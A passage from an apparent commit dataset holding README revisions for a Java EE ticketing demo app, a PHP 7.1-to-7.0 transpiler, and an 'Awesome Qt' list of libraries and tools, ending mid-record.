a RESTful web service endpoint;\n* *Ejb (or *EJB) of course represents an Enterprise JavaBean.\n\n== ToDos\n\n=== Basics\n\nUse http:\/\/www.stateofflow.com\/journal\/66\/creating-java-projects-programmatically to create Eclipse\nprojects for different courses.\n\n=== Beyond The Basics\n\nThe following is IN ADDITION to getting\nthe basic functionality working across all the designated APIs\nthat we need to demonstrate in the courses. 
It's more a placeholder\nfor IDEAS than an actual list of steps to do.\n\n* Digest an RSS feed of new movies, concerts, acts, and load into the database.\n* \"Sync Instance\" feature to update the database from a master copy on the Internet.\n\n=== Cross-Platformality\n\nMaybe use https:\/\/github.com\/google\/j2objc\/[j2objc] to make iOS versions of at least the Model classes.\n","old_contents":"= TicketManor\n\nThis is a demo application of building enterprise applications using Java EE. There are \na variety of APIs used, e.g., Java EE (JPA, EJB), Spring Framework, modern SPA Web (Angular, Ember.JS),\nand so on. Each major framework has its own subdirectory.\n\nIt will be used as a showcase in various courses offered by http:\/\/learningtree.com\/[Learning Tree],\nthe world leader in instructor-led tecnical training. Learning Tree offers courses in Java\nas well as many other enterprise applications.\n\nLegal Note: We do _not_ intend this to be a passing-off of TicketMaster.com, which is a trademark in\nmost countries. It is just a demonstration of how certain parts of an enterprise app could\nbe implemented. WE ARE NOT ACTUALLY SELLING ANY TICKETS.\n\nThis site is *not* affiliated in any way with http:\/\/ticketmaster.com\/[TicketMaster(TM)] nor any\nother commercial ticket selling organization.\n\n== Building\n\nThe Java projects generally use Eclipse to write\/compile\/test code and Maven to build\/package.\nThe Android project uses Android Studio (based on IntelliJ IDea) to write code\nand Gradle to compile\/test\/package.\n\nThe top-level Maven pom runs each of the other projects (including android, through\na Maven plug-in that knows how to run Gradle).\n\n.*Build*\nimage:http:\/\/img.shields.io\/badge\/license-BSD2-green.svg[link=\"http:\/\/github.com\/LearningTree\/TicketManorJava\"]\nimage:https:\/\/img.shields.io\/maven-central\/v\/org.apache.maven\/apache-maven.svg\"[link=\"http:\/\/search.maven.org\/#search%7Cga%7C1%7Ca%3A%22darwinsys-api%22\"]\n\n== Deployment\n\nThe server projects are configured to deploy with the EE Server WildFly 8+\n\nYou MUST change the file ${WILDFLYHOME}\/standalone\/configuration\/standalone.xml AND standalone-full.xml to have\na datasource named TicketManorDataSource. For initial testing I just added:\n\n\t<datasource jndi-name=\"java:jboss\/datasources\/TicketManorDataSource\" pool-name=\"TicketManorPool\" \n\t\tenabled=\"true\" use-java-context=\"true\">\n\t\t<connection-url>jdbc:h2:mem:ticketmanor;DB_CLOSE_DELAY=-1;DB_CLOSE_ON_EXIT=FALSE<\/connection-url>\n\t\t<driver>h2<\/driver>\n\t\t<security>\n\t\t\t<user-name>sa<\/user-name>\n\t\t\t<password>sa<\/password>\n\t\t<\/security>\n\t<\/datasource>\n\nWe should someday change this to MySQL or a real database before deployment.\n\nN.B. 
Never give the production app unfettered access to the database;\nlimit it by doing something like this (commands are from PostgreSQL but\nwill be similar on other DB products):\n\n----\nwebsite=# create role myAppAcct login password 'siuojk21jsr';\nCREATE ROLE\nwebsite=# grant select,insert on someTable to myAppAcct;\nGRANT\nwebsite=# \n----\n\nYou might need a few other perms if JPA\/Hibernate is running in \"create\" or \"update\" mode,\nbut these modes should not really be used in production!\n\n== Naming Conventions\n\nIn the Java code:\n\n* *Bean means either a JSF managed JavaBean or a Spring-managed JavaBean;\n* *Resource means a RESTful web service endpoint;\n* *Ejb (or *EJB) of course represents an Enterprise JavaBean.\n\n== ToDos\n\n=== Basics\n\nUse http:\/\/www.stateofflow.com\/journal\/66\/creating-java-projects-programmatically to create Eclipse\nprojects for different courses.\n\n=== Beyond The Basics\n\nThe following is IN ADDITION to getting\nthe basic functionality working across all the designated APIs\nthat we need to demonstrate in the courses. It's more a placeholder\nfor IDEAS than an actual list of steps to do.\n\n* Digest an RSS feed of new movies, concerts, acts, and load into the database.\n* \"Sync Instance\" feature to update the database from a master copy on the Internet.\n\n=== Cross-Platformality\n\nMaybe use https:\/\/github.com\/google\/j2objc\/[j2objc] to make iOS versions of at least the Model classes.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"39ec70eda2a342c8910e814e966e44f7301ce89d","subject":"add logo to readme","message":"add logo to readme\n","repos":"Mikulas\/transpiler,Mikulas\/transpiler","old_file":"README.adoc","new_file":"README.adoc","new_contents":":toc: macro\n:!toc-title:\n:source-language: php\n\n++++\n<img height=\"150\" src=\"https:\/\/mikulas.github.io\/assets\/transpiler.svg\" align=\"right\" \/>\n++++\n= Transpiler\n\nPHP source code transformations.\n\nimage:https:\/\/circleci.com\/gh\/Mikulas\/transpiler.svg?style=svg&circle-token=95af859daa8a8d404100caf22e52269e447012f3[\"CircleCI\", link=\"https:\/\/circleci.com\/gh\/Mikulas\/transpiler\"]\n\ntoc::[]\n\n== What Is It Good For?\n\nBy transpiling code to older runtime versions you gain\nmany benefits of PHP 7.1 such as void return types and\noptionals (which are mostly useful for static analysis),\nbut you are not forced to update production to unstable\nbleeding-edge versions.\n\n== Implemented AST modifiers:\n\n=== PHP 7.1 -> 7.0\n\nhttp:\/\/php.net\/manual\/en\/migration71.new-features.php\n\n==== Remove void return types\n\n```\nfunction foo(): void\n{\n}\n\n# -->\n\nfunction foo()\n{\n}\n```\n\n__Limitations:__ `ReflectionFunctionAbstract::getReturnType()` and `hasReturnType()` will return `NULL` and `FALSE` respectively instead of original values.\n\n==== Remove class constant visibilities\n\n```\nclass Foo\n{\n public const A = 'a';\n protected const B = 'b';\n private const C = 'c';\n}\n\n# -->\n\nclass Foo\n{\n const A = 'a';\n const B = 'b';\n const C = 'c';\n}\n```\n\n__Limitations:__ none\n\n==== Rollout named assignment\n\n```\n['X' => ['A' => $a, 'B' => $b]] = ['X' => ['A' => 10, 'B' => 20]];\nlist('T' => list('U' => $u, 'V' => $v)) = ['T' => ['U' => 15, 'V' => 19]];\n\nwhile (list($a, $b) = $right) {\n block();\n}\n# -->\n\n${'~transpiler-1'} = ['X' => ['A' => 10, 'B' => 20]];\n$a = ${'~transpiler-1'}['X']['A'];\n$b = ${'~transpiler-1'}['X']['B'];\n\n${'~transpiler-2'} = ['T' => ['U' => 15, 'V' => 19]];\n$u = 
${'~transpiler-2'}['T']['U'];\n$v = ${'~transpiler-2'}['T']['V'];\n\nwhile (${'~transpiler-3'} = $right) {\n $a = ${'~transpiler-3'}[0];\n $b = ${'~transpiler-3'}[1];\n block();\n}\n```\n\n__Limitations:__ slightly worse performance, introduces new variable\n\nDynamic mutating keys are not supported.\n```\n[$x++ => $a, $x++ => $b] = [10, 20];\n```\n\n=== Remove nullable return type\n\n```\nfunction sum(): ?int\n{\n}\n\n# -->\n\nfunction sum()\n{\n}\n```\n\n=== Convert nullable parameter\n\n```\nfunction sum(?int $a, ?int $b)\n{\n}\n\n# -->\n\nfunction sum(int $a = NULL, int $b = NULL)\n{\n}\n```\n\n=== Remove iterable type\n\n```\nfunction compute(iterable $arr): iterable\n{\n}\n\n# -->\n\nfunction compute($arr)\n{\n}\n```\n\n\n=== Convert `Closure::fromCallable`\n\n```\nClosure::fromCallable('intdiv');\nClosure::fromCallable([$foo, 'bar']);\nClosure::fromCallable([Foo::class, 'qaz']);\nClosure::fromCallable($foo($a = $b));\n\n# -->\n\nfunction () {\n return call_user_func_array('intdiv', func_get_args());\n};\n\nfunction () use(&$foo) {\n return call_user_func_array([$foo, 'bar'], func_get_args());\n};\n\nfunction () {\n return call_user_func_array([Foo::class, 'qaz'], func_get_args());\n};\n\nfunction () use(&$foo, &$a, &$b) {\n return call_user_func_array($foo($a = $b), func_get_args());\n};\n```\n\n__Limitations:__ FQN is not resolved, so aliases to Closure do not work. Dynamic invocation does not work either (such as from `call_user_func`).\n\n\n=== Expand multi catch exception handlers\n\n```\ntry {\n} catch (FooException | BarException $e) {\n handler();\n}\n\n# -->\n\ntry {\n} catch (FooException $e) {\n handler();\n} catch (BarException $e) {\n handler();\n}\n```\n","old_contents":"= Transpiler\n:toc: macro\n:!toc-title:\n:source-language: php\n\nPHP source code transformations.\n\nimage:https:\/\/circleci.com\/gh\/Mikulas\/transpiler.svg?style=svg&circle-token=95af859daa8a8d404100caf22e52269e447012f3[\"CircleCI\", link=\"https:\/\/circleci.com\/gh\/Mikulas\/transpiler\"]\n\ntoc::[]\n\n== What Is It Good For?\n\nBy transpiling code to older runtime versions you gain\nmany benefits of PHP 7.1 such as void return types and\noptionals (which are mostly useful for static analysis),\nbut you are not forced to update production to unstable\nbleeding-edge versions.\n\n== Implemented AST modifiers:\n\n=== PHP 7.1 -> 7.0\n\nhttp:\/\/php.net\/manual\/en\/migration71.new-features.php\n\n==== Remove void return types\n\n```\nfunction foo(): void\n{\n}\n\n# -->\n\nfunction foo()\n{\n}\n```\n\n__Limitations:__ `ReflectionFunctionAbstract::getReturnType()` and `hasReturnType()` will return `NULL` and `FALSE` respectively instead of original values.\n\n==== Remove class constant visibilities\n\n```\nclass Foo\n{\n public const A = 'a';\n protected const B = 'b';\n private const C = 'c';\n}\n\n# -->\n\nclass Foo\n{\n const A = 'a';\n const B = 'b';\n const C = 'c';\n}\n```\n\n__Limitations:__ none\n\n==== Rollout named assignment\n\n```\n['X' => ['A' => $a, 'B' => $b]] = ['X' => ['A' => 10, 'B' => 20]];\nlist('T' => list('U' => $u, 'V' => $v)) = ['T' => ['U' => 15, 'V' => 19]];\n\nwhile (list($a, $b) = $right) {\n block();\n}\n# -->\n\n${'~transpiler-1'} = ['X' => ['A' => 10, 'B' => 20]];\n$a = ${'~transpiler-1'}['X']['A'];\n$b = ${'~transpiler-1'}['X']['B'];\n\n${'~transpiler-2'} = ['T' => ['U' => 15, 'V' => 19]];\n$u = ${'~transpiler-2'}['T']['U'];\n$v = ${'~transpiler-2'}['T']['V'];\n\nwhile (${'~transpiler-3'} = $right) {\n $a = ${'~transpiler-3'}[0];\n $b = ${'~transpiler-3'}[1];\n 
block();\n}\n```\n\n__Limitations:__ slightly worse performance, introduces new variable\n\nDynamic mutating keys are not supported.\n```\n[$x++ => $a, $x++ => $b] = [10, 20];\n```\n\n=== Remove nullable return type\n\n```\nfunction sum(): ?int\n{\n}\n\n# -->\n\nfunction sum()\n{\n}\n```\n\n=== Convert nullable parameter\n\n```\nfunction sum(?int $a, ?int $b)\n{\n}\n\n# -->\n\nfunction sum(int $a = NULL, int $b = NULL)\n{\n}\n```\n\n=== Remove iterable type\n\n```\nfunction compute(iterable $arr): iterable\n{\n}\n\n# -->\n\nfunction compute($arr)\n{\n}\n```\n\n\n=== Convert `Closure::fromCallable`\n\n```\nClosure::fromCallable('intdiv');\nClosure::fromCallable([$foo, 'bar']);\nClosure::fromCallable([Foo::class, 'qaz']);\nClosure::fromCallable($foo($a = $b));\n\n# -->\n\nfunction () {\n return call_user_func_array('intdiv', func_get_args());\n};\n\nfunction () use(&$foo) {\n return call_user_func_array([$foo, 'bar'], func_get_args());\n};\n\nfunction () {\n return call_user_func_array([Foo::class, 'qaz'], func_get_args());\n};\n\nfunction () use(&$foo, &$a, &$b) {\n return call_user_func_array($foo($a = $b), func_get_args());\n};\n```\n\n__Limitations:__ FQN is not resolved, so aliases to Closure do not work. Dynamic invocation does not work either (such as from `call_user_func`).\n\n\n=== Expand multi catch exception handlers\n\n```\ntry {\n} catch (FooException | BarException $e) {\n handler();\n}\n\n# -->\n\ntry {\n} catch (FooException $e) {\n handler();\n} catch (BarException $e) {\n handler();\n}\n```\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"bcf11f7da0280b00eef5693364931889d321dce1","subject":"Add main section about other registries","message":"Add main section about other registries\n","repos":"insideqt\/awesome-qt","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Awesome Qt\n:icons: font\n:toc: preamble\n:toc-title:\n\n:MIT: http:\/\/opensource.org\/licenses\/MIT[MIT license.]\n\nA curated list of links to awesome Qt-related libraries, tools, and other\nresources published under Free Software\/Open Source licenses.\n\nDon't forget to check http:\/\/doc.qt.io\/qt-5\/qtmodules.html[the list of essential\nand add-on modules from the Qt project] first! Upcoming modules might be in\n`qt-labs` or `playground` in http:\/\/code.qt.io\/[code.qt.io]. And remember that\nthere is https:\/\/github.com\/fffaraz\/awesome-cpp[Awesome C\/C++] for more projects\nthat don't use Qt.\n\n\n\n== Other registries \/ package managers\n\nThere are other projects that aim to provide not only an entry point to find\nother Qt libraries, but also a tool to download and configure them.\n\nhttp:\/\/inqlude.org\/::\nA large list of Qt libraries, categorized by maturity level and license. Is the\noldest and largest archive of Qt projects. A project from the\nhttp:\/\/www.kde.org[KDE] community.\n\nhttps:\/\/www.qpm.io\/::\nA package manager for Qt, from the http:\/\/www.cutehacks.com\/[Cutehacks]\ndevelopers. 
Is the youngest project, but features the best command line tool to\ninstall packages.\n\nhttp:\/\/www.qt-pods.org\/::\nInspired by the Cocoa pods project, a package manager with even a GUI interface\nbased on git submodules.\n\n\n\n== Libraries\n\n\n=== Databases\n\nhttps:\/\/github.com\/KDAB\/sqlate::\nCompile-time checked type-safe access to SQL databases using C++ templates.\nAllows you to get rid of string-based SQL queries in your Qt application.\n\n\n=== Event loop dispatchers\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_epoll::\nepoll-based event dispatcher\n\nhttps:\/\/github.com\/connectedtable\/qeventdispatcher_epoll::\nepoll event dispatcher\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_libevent::\nlibevent-based event dispatcher\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_libev::\nlibev-based event dispatcher\n\nhttps:\/\/github.com\/svalaskevicius\/qt-event-dispatcher-libuv::\nlibuv event dispatcher\n\n\n=== File formats\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/karchive\/html\/::\nProvides classes for easy reading, creation and manipulation of \"archive\"\nformats like ZIP and TAR. It also provides transparent compression and\ndecompression of data, like the GZip format, via a subclass of QIODevice.\n\nhttps:\/\/github.com\/flavio\/qjson::\nLibrary that maps JSON data to QVariant objects. Supports Qt 4.\n\nhttps:\/\/github.com\/gaudecker\/qt-json::\nA simple class for parsing JSON data into a QVariant hierarchy and vice versa.\nSupports Qt 4.\n\n\n=== Gaming\n\nhttps:\/\/github.com\/Bacon2D\/Bacon2D::\nFramework to ease 2D game development, providing ready-to-use QML elements\nrepresenting basic game entities needed by most of games. Starting with the\ntop-level Game container, which provides a game loop and Scene management, all\nthe way down to entities with Box2D physics and parallax layers with infinite\nscrolling.\n\nhttps:\/\/github.com\/qml-box2d\/qml-box2d::\nBox2D plugin for QML. The goal is to expose the functionality of Box2D as QML\ncomponents, in order to make it easy to write physics based games in QML.\n\nhttp:\/\/v-play.net\/::\nAllows easy cross-platform mobile game development for all major platforms\nincluding iOS, Android, BlackBerry.\n\n\n=== Graphics\n\nhttp:\/\/www.kdab.com\/kd-reports\/::\nLets you easily create printable reports by providing all of the necessary\nfeatures for a variety of applications. Reports can be created programmatically,\nusing an easy to use C++ API, or they can be data-driven, creating reports from\nXML or SQL data sources complete with watermarks, headers and footers. Reports\ncan be previewed manually, sent directly to a printer, or saved as PDF files.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kimageformats\/html\/::\nProvides additional image format plugins for QtGui. Read support for: Gimp\n(xcf), OpenEXR (exr), Photoshop documents (psd), Sun Raster (ras). Write support\nfor: Encapsulated PostScript (eps), Personal Computer Exchange (pcx), SGI images\n(rgb, rgba, sgi, bw), Softimage PIC (pic), Targa (tga), XView (xv).\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kplotting\/html\/::\nA lightweight and easy to use plot widget.\n\/\/ TODO: Original description was pretty bad. 
I think this is the best I can say\n\/\/ right now, but help improving this is more than welcome.\n\nhttps:\/\/github.com\/gamecreature\/QtAwesome::\nLibrary for using http:\/\/fortawesome.github.io\/Font-Awesome\/[Font Awesome] or\nother icon sets based on font files.\n\nhttp:\/\/qwt.sourceforge.net\/::\nQt Widgets for Technical Applications. Contains GUI components and utility\nclasses which are primarily useful for programs with a technical background.\nBesides a framework for 2D plots, it provides scales, sliders, dials, compasses,\nthermometers, wheels and knobs to control or display values, arrays, or ranges\nof type double.\n\n\n=== Hardware detection and interaction\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/bluez-qt\/html\/::\nBluezQt is a library for communication with the BlueZ system and session\ndaemons.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/solid\/html\/::\nA device integration framework. It provides a way of querying and\ninteracting with hardware independently of the underlying operating system.\nIt provides the following features for application developers: Hardware\nDiscovery, Power Management, and Network Management.\n\n\n=== Inter process communication\n\n\n=== Multimedia\n\nhttp:\/\/www.qtav.org\/::\nQtAV is a multimedia playback library based on Qt and FFmpeg. Supports Android,\niOS and desktops.\n\nhttps:\/\/vlc-qt.tano.si\/::\nContains core classes for main media playback and some GUI classes for faster\nmedia player development.\n\n=== Network protocols and web services\n\nhttp:\/\/communi.github.io\/::\nA cross-platform IRC framework. Provides a set of tools for enabling IRC\nconnectivity in Qt-based C++ and QML applications.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kdnssd\/html\/::\nLibrary for handling the DNS-based Service Discovery Protocol (DNS-SD), the\nlayer of Zeroconf that allows network services, such as printers, to be\ndiscovered without any user intervention or centralized infrastructure.\n\nhttps:\/\/github.com\/wiedi\/libmaia::\nXML-RPC library.\n\n\n=== Other programming languages\n\nhttps:\/\/github.com\/seanchas116\/libqmlbind::\nA C library for easily creating QML bindings for other languages by exporting\nobjects to QML. In use in `ruby-qml`.\n\nhttp:\/\/www.riverbankcomputing.com\/software\/pyqt\/::\nA set of Python 2 and Python 3 bindings for Qt that runs on all platforms\nsupported by Qt, including Windows, OS X and Linux. PyQt5 supports Qt 5.\n\nhttp:\/\/thp.io\/2011\/pyotherside\/::\nAsynchronous Python 3 bindings for Qt 5. This is a QML plugin that provides\naccess to a Python 3 interpreter from QML.\n\nhttps:\/\/wiki.qt.io\/Category:LanguageBindings::PySide::\nProvides LGPL-licensed Python bindings for Qt. It also includes a complete\ntoolchain for rapidly generating bindings for any Qt-based C++ class\nhierarchy.\n\nhttp:\/\/seanchas116.github.io\/ruby-qml\/::\nBindings between Ruby and QML. Enables you to write Qt Quick GUIs in Ruby.\n\nhttps:\/\/github.com\/trollixx\/node.qml::\nNode.js compatibility layer for QML applications. Potentially, QML applications\nshould be able to use the majority of Node.js libraries.\n\n\n=== Threading and asynchronous programming\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/threadweaver\/html\/::\nHelper for multithreaded programming. It uses a job-based interface to queue\ntasks and execute them in an efficient way. 
You simply divide the workload into\njobs, state the dependencies between the jobs, and ThreadWeaver will work out the\nmost efficient way of dividing the work between threads within a set of resource\nlimits.\n\n\n=== User Interface\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kguiaddons\/html\/::\nUtilities for graphical user interfaces in the areas of colors, fonts, text,\nimages, keyboard input.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kitemmodels\/html\/::\nA set of extra item models for the model-view framework.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kitemviews\/html\/::\nIncludes a set of views, which can be used with item models. It includes views\nfor categorizing lists and for adding search filters to flat and hierarchical lists.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kwidgetsaddons\/html\/::\nAction classes that can be added to toolbars or menus, a wide range of widgets\nfor selecting characters, fonts, colors, actions, dates and times, or MIME\ntypes, as well as platform-aware dialogs for configuration pages, message boxes,\nand password requests.\n\nhttps:\/\/github.com\/mikemcquaid\/Qocoa::\nWrappers for OS X Cocoa widgets. {MIT}\n\nhttps:\/\/github.com\/shadone\/qtmacgoodies::\nAdditional widgets\/objects to make applications look more native on Mac OS X,\nlike `MacPreferencesWindow`, `MacStandardIcon` or `MacWindow`.\n\nhttps:\/\/github.com\/cybercatalyst\/qtsystemtrayiconmac::\nExtended QSystemTrayIcon for Mac OS X.\n\n\n=== Web frameworks\n\nhttp:\/\/cutelyst.org\/::\nMVC web framework inspired by Perl's Catalyst.\n\nhttps:\/\/github.com\/jlaine\/qdjango\/::\nQDjango is a web framework written in C++ and built on top of the Qt library.\nWhere possible it tries to follow Django's API, hence its name.\n\nhttp:\/\/www.treefrogframework.org\/::\nHigh-speed and full-stack web application framework based on C++ and Qt, which\nsupports the HTTP and WebSocket protocols. Web applications can run faster than those\nwritten in lightweight scripting languages. In application development, it provides an\nO\/R mapping system and template system on an MVC architecture, and aims to achieve\nhigh productivity through the policy of convention over configuration.\n\nhttps:\/\/github.com\/vinipsmaker\/tufao::\nTuf\u00e3o is a web framework for C++ that makes use of Qt's object communication\nsystem (signals & slots).\n\n\n=== Miscellany\n\nhttps:\/\/github.com\/sergey-shambir\/breakpad-qt::\nCross-platform crash handler, implemented as a wrapper around google-breakpad.\n\nhttps:\/\/github.com\/dschmidt\/libcrashreporter-qt::\nProvides easy integration of Google Breakpad crash reporting into a Qt\napplication.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kconfig\/html\/::\nProvides an advanced configuration system. The core provides access to the\nfiles, with a code generation system to have type-safe access to the\nconfiguration, which features cascading files (global versus local), shell\nexpansion, and locking down options. 
The GUI provides a way to hook widgets to\nthe configuration so that they are automatically initialized from the\nconfiguration and automatically propagate their changes to their respective\nconfiguration files.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kcoreaddons\/html\/::\nSupport classes for manipulating mime types, autosaving files, creating backup\nfiles, generating random sequences, performing text manipulations such as macro\nreplacement, accessing user information and more.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/ki18n\/html\/::\nProvides functionality for internationalizing user interface text in\napplications, based on the GNU Gettext translation system. It wraps the standard\nGettext functionality, so that the programmers and translators can use the\nfamiliar Gettext tools and workflows. KI18n provides additional functionality:\nargument capturing, customizable markup, and translation scripting.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kidletime\/html\/::\nReports information on idle time. It is useful not only for finding out about\nthe current idle time of the PC, but also for getting notified upon idle time\nevents, such as custom timeouts or user activity.\n\nhttps:\/\/github.com\/Roxee\/qt-roxeemegaup\/::\nWrapper around Sparkle and WinSparkle.\n\nhttps:\/\/github.com\/Roxee\/qt-roxeeplatipus::\nA collection of helpers and additional functionalities for Qt (media key\nsupport, OS X remote control, fullscreen native window hack).\n\nhttps:\/\/github.com\/Roxee\/qt-roxeesinapp::\nAn up-to-date QtSingleApplication fork.\n\nhttps:\/\/github.com\/VerbalExpressions\/QtVerbalExpressions::\nRegular Expressions made easy. Match and replace in strings with an easy-to-use\nAPI.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/sonnet\/html\/::\nPlugin-based spell-checking library for Qt-based applications. It supports\nseveral different plugins, including HSpell, Enchant, ASpell and HUNSPELL. It\nalso supports automated language detection, based on a combination of different\nalgorithms.\n\n\n== Tools\n\nhttps:\/\/github.com\/KDAB\/GammaRay::\nGammaRay is a tool to poke around in a Qt application and also to manipulate the\napplication to some extent.\n\nhttps:\/\/github.com\/robertknight\/Qt-Inspector::\nUtility to browse the Qt object tree of a running Qt application and edit object\nproperties on the fly.\n\n\n\n== Off topic\n\nNOTE: Stuff that might not integrate at all with Qt's types, API, or event loop,\nbut that an application built with Qt can still leverage well enough, because\nit is cross-platform native code that fulfills a common use case of typical\nQt applications.\n\nhttps:\/\/github.com\/Mendeley\/breakpad::\nThis is a fork of Google Breakpad, a multi-platform crash reporting system,\nwhich is used by Mendeley Desktop under Windows, Mac and Linux.\n\nhttps:\/\/github.com\/Mendeley\/Update-Installer::\nSmall cross-platform software update installer.\n","old_contents":"= Awesome Qt\n:icons: font\n:toc: preamble\n:toc-title:\n\n:MIT: http:\/\/opensource.org\/licenses\/MIT[MIT license.]\n\nA curated list of links to awesome Qt-related libraries, tools, and other\nresources published under Free Software\/Open Source licenses.\n\nDon't forget to check http:\/\/doc.qt.io\/qt-5\/qtmodules.html[the list of essential\nand add-on modules from the Qt project] first! Upcoming modules might be in\n`qt-labs` or `playground` in http:\/\/code.qt.io\/[code.qt.io]. 
And remember that\nthere is https:\/\/github.com\/fffaraz\/awesome-cpp[Awesome C\/C++] for more projects\nthat don't use Qt.\n\n\n\n== Libraries\n\n\n=== Databases\n\nhttps:\/\/github.com\/KDAB\/sqlate::\nCompile-time checked type-safe access to SQL databases using C++ templates.\nAllows you to get rid of string-based SQL queries in your Qt application.\n\n\n=== Event loop dispatchers\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_epoll::\nepoll-based event dispatcher\n\nhttps:\/\/github.com\/connectedtable\/qeventdispatcher_epoll::\nepoll event dispatcher\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_libevent::\nlibevent-based event dispatcher\n\nhttps:\/\/github.com\/sjinks\/qt_eventdispatcher_libev::\nlibev-based event dispatcher\n\nhttps:\/\/github.com\/svalaskevicius\/qt-event-dispatcher-libuv::\nlibuv event dispatcher\n\n\n=== File formats\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/karchive\/html\/::\nProvides classes for easy reading, creation and manipulation of \"archive\"\nformats like ZIP and TAR. It also provides transparent compression and\ndecompression of data, like the GZip format, via a subclass of QIODevice.\n\nhttps:\/\/github.com\/flavio\/qjson::\nLibrary that maps JSON data to QVariant objects. Supports Qt 4.\n\nhttps:\/\/github.com\/gaudecker\/qt-json::\nA simple class for parsing JSON data into a QVariant hierarchy and vice versa.\nSupports Qt 4.\n\n\n=== Gaming\n\nhttps:\/\/github.com\/Bacon2D\/Bacon2D::\nFramework to ease 2D game development, providing ready-to-use QML elements\nrepresenting basic game entities needed by most of games. Starting with the\ntop-level Game container, which provides a game loop and Scene management, all\nthe way down to entities with Box2D physics and parallax layers with infinite\nscrolling.\n\nhttps:\/\/github.com\/qml-box2d\/qml-box2d::\nBox2D plugin for QML. The goal is to expose the functionality of Box2D as QML\ncomponents, in order to make it easy to write physics based games in QML.\n\nhttp:\/\/v-play.net\/::\nAllows easy cross-platform mobile game development for all major platforms\nincluding iOS, Android, BlackBerry.\n\n\n=== Graphics\n\nhttp:\/\/www.kdab.com\/kd-reports\/::\nLets you easily create printable reports by providing all of the necessary\nfeatures for a variety of applications. Reports can be created programmatically,\nusing an easy to use C++ API, or they can be data-driven, creating reports from\nXML or SQL data sources complete with watermarks, headers and footers. Reports\ncan be previewed manually, sent directly to a printer, or saved as PDF files.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kimageformats\/html\/::\nProvides additional image format plugins for QtGui. Read support for: Gimp\n(xcf), OpenEXR (exr), Photoshop documents (psd), Sun Raster (ras). Write support\nfor: Encapsulated PostScript (eps), Personal Computer Exchange (pcx), SGI images\n(rgb, rgba, sgi, bw), Softimage PIC (pic), Targa (tga), XView (xv).\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kplotting\/html\/::\nA lightweight and easy to use plot widget.\n\/\/ TODO: Original description was pretty bad. I think this is the best I can say\n\/\/ right now, but help improving this is more than welcome.\n\nhttps:\/\/github.com\/gamecreature\/QtAwesome::\nLibrary for using http:\/\/fortawesome.github.io\/Font-Awesome\/[Font Awesome] or\nother icon sets based on font files.\n\nhttp:\/\/qwt.sourceforge.net\/::\nQt Widgets for Technical Applications. 
Contains GUI Components and utility\nclasses which are primarily useful for programs with a technical background.\nBeside a framework for 2D plots it provides scales, sliders, dials, compasses,\nthermometers, wheels and knobs to control or display values, arrays, or ranges\nof type double.\n\n\n=== Hardware detection and interaction\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/bluez-qt\/html\/::\nBluezQt is a library for communication with the BlueZ system and session\ndaemons.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/solid\/html\/::\nA device integration framework. It provides a way of querying and\ninteracting with hardware independently of the underlying operating system.\nIt provides the following features for application developers: Hardware\nDiscovery, Power Management, and Network Management.\n\n\n=== Inter process communication\n\n\n=== Multimedia\n\nhttp:\/\/www.qtav.org\/::\nQtAV is a multimedia playback library based on Qt and FFmpeg. Supports Android,\niOS and desktops.\n\nhttps:\/\/vlc-qt.tano.si\/::\nContains core classes for main media playback and some GUI classes for faster\nmedia player developement.\n\n=== Network protocols and web services\n\nhttp:\/\/communi.github.io\/::\nA cross-platform IRC framework. Provides a set of tools for enabling IRC\nconnectivity in Qt-based C++ and QML applications.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kdnssd\/html\/::\nLibrary for handling the DNS-based Service Discovery Protocol (DNS-SD), the\nlayer of Zeroconf that allows network services, such as printers, to be\ndiscovered without any user intervention or centralized infrastructure.\n\nhttps:\/\/github.com\/wiedi\/libmaia::\nXML-RPC library.\n\n\n=== Other programming languages\n\nhttps:\/\/github.com\/seanchas116\/libqmlbind::\nA C library for easily creating QML bindings for other languages by exporting\nobjects to QML. In use in `ruby-qml`.\n\nhttp:\/\/www.riverbankcomputing.com\/software\/pyqt\/::\nA set of Python 2 and Python 3 bindings for Qt and runs on all platforms\nsupported by Qt including Windows, OS X and Linux. PyQt5 supports Qt 5.\n\nhttp:\/\/thp.io\/2011\/pyotherside\/::\nAsynchronous Python 3 Bindings for Qt 5. This is a QML Plugin that provides\naccess to a Python 3 interpreter from QML.\n\nhttps:\/\/wiki.qt.io\/Category:LanguageBindings::PySide::\nProvides LGPL-licensed Python bindings for Qt. It also includes a complete\ntoolchain for rapidly generating bindings for any Qt-based C++ 